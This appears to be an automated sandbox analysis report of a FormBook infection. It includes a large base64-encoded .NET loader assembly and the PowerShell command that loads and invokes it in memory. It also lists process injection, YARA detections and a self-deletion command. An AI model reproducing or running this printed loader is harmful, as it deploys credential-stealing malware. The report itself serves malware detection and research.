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');[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] (' ??v?}???@+@ ?@@ ??v?}??.onis4*?*?#:?v4*?*?#:?k!}( }il!}( }.8*??(ws8*??(rf4*?*?#:?4*?*?#:??? }??+?p ??v?}?? ??v?}???*(??@*?','1No1me_Startup','2No3me_3tartup'))
                                        Imagebase:0x7ff752ef0000
                                        File size:447'488 bytes
                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        General

                                        Target ID:2
                                        Start time:09:48:49
                                        Start date:13/07/2023
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625'664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:3
                                        Start time:09:48:53
                                        Start date:13/07/2023
                                        Path:C:\Windows\SysWOW64\svchost.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\svchost.exe
                                        Imagebase:0xdd0000
                                        File size:44'520 bytes
                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        General

                                        Target ID:4
                                        Start time:09:48:54
                                        Start date:13/07/2023
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff69fe90000
                                        File size:3'933'184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000004.00000002.906043086.000000000756C000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high

                                        General

                                        Target ID:7
                                        Start time:09:49:10
                                        Start date:13/07/2023
                                        Path:C:\Windows\SysWOW64\cmmon32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                        Imagebase:0xdd0000
                                        File size:36'864 bytes
                                        MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        General

                                        Target ID:8
                                        Start time:09:49:14
                                        Start date:13/07/2023
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
                                        Imagebase:0xb0000
                                        File size:232'960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:9
                                        Start time:09:49:15
                                        Start date:13/07/2023
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625'664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:16.9%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:12
                                          Total number of Limit Nodes:0

                                          Callgraph

                                          • Executed
                                          • Not Executed
                                          • Opacity -> Relevance
                                          • Disassembly available
                                          callgraph 0 Function_00007FFBAC2B29D5 79 Function_00007FFBAC2B2990 0->79 1 Function_00007FFBAC2B0ED1 2 Function_00007FFBAC3805E5 3 Function_00007FFBAC2B43D0 4 Function_00007FFBAC2B34D0 4->79 88 Function_00007FFBAC2B1480 4->88 5 Function_00007FFBAC2B29C6 5->79 6 Function_00007FFBAC2B28C8 7 Function_00007FFBAC2B0ABD 8 Function_00007FFBAC2B22BC 9 Function_00007FFBAC2B04B5 10 Function_00007FFBAC2B12BA 11 Function_00007FFBAC2B04AD 12 Function_00007FFBAC2B34B0 13 Function_00007FFBAC2B04A5 14 Function_00007FFBAC2B48A4 32 Function_00007FFBAC2B4D02 14->32 15 Function_00007FFBAC2B34A9 15->79 15->88 16 Function_00007FFBAC2B0BAA 17 Function_00007FFBAC2B12AA 18 Function_00007FFBAC2B03A7 19 Function_00007FFBAC2B279E 20 Function_00007FFBAC2B029B 21 Function_00007FFBAC2B179B 22 Function_00007FFBAC2B00A1 23 Function_00007FFBAC2B14A2 24 Function_00007FFBAC2B2D9F 25 Function_00007FFBAC2B0A15 26 Function_00007FFBAC2B2415 27 Function_00007FFBAC380FA2 28 Function_00007FFBAC2B0A05 29 Function_00007FFBAC2B3D04 35 Function_00007FFBAC2B3DF9 29->35 30 Function_00007FFBAC2B000A 31 Function_00007FFBAC2B2B07 31->79 33 Function_00007FFBAC2B16F5 34 Function_00007FFBAC2B2BF6 36 Function_00007FFBAC2B09E5 37 Function_00007FFBAC2B1AE9 38 Function_00007FFBAC2B3AE9 62 Function_00007FFBAC2B3C32 38->62 39 Function_00007FFBAC2B27E8 40 Function_00007FFBAC2B16DB 41 Function_00007FFBAC2B28DC 41->79 42 Function_00007FFBAC2B1FE1 43 Function_00007FFBAC2B39E2 47 Function_00007FFBAC2B1550 43->47 54 Function_00007FFBAC2B1540 43->54 43->62 44 Function_00007FFBAC2B36E0 44->88 45 Function_00007FFBAC2B0C57 46 Function_00007FFBAC2B034B 48 Function_00007FFBAC2B2C43 49 Function_00007FFBAC380170 50 Function_00007FFBAC2B4144 51 Function_00007FFBAC2B3449 52 Function_00007FFBAC2B3E3D 53 Function_00007FFBAC2B233F 55 Function_00007FFBAC2B2040 56 Function_00007FFBAC2B4040 57 Function_00007FFBAC2B0433 58 Function_00007FFBAC38047E 59 Function_00007FFBAC2B3F38 60 Function_00007FFBAC2B0B2D 61 Function_00007FFBAC2B362D 61->79 61->88 63 Function_00007FFBAC2B2832 64 Function_00007FFBAC2B2C2F 64->79 65 Function_00007FFBAC2B0A25 66 Function_00007FFBAC2B3226 67 Function_00007FFBAC2B2A29 67->79 68 Function_00007FFBAC38028D 69 Function_00007FFBAC2B2E1D 70 Function_00007FFBAC2B3A1B 70->47 70->54 70->62 71 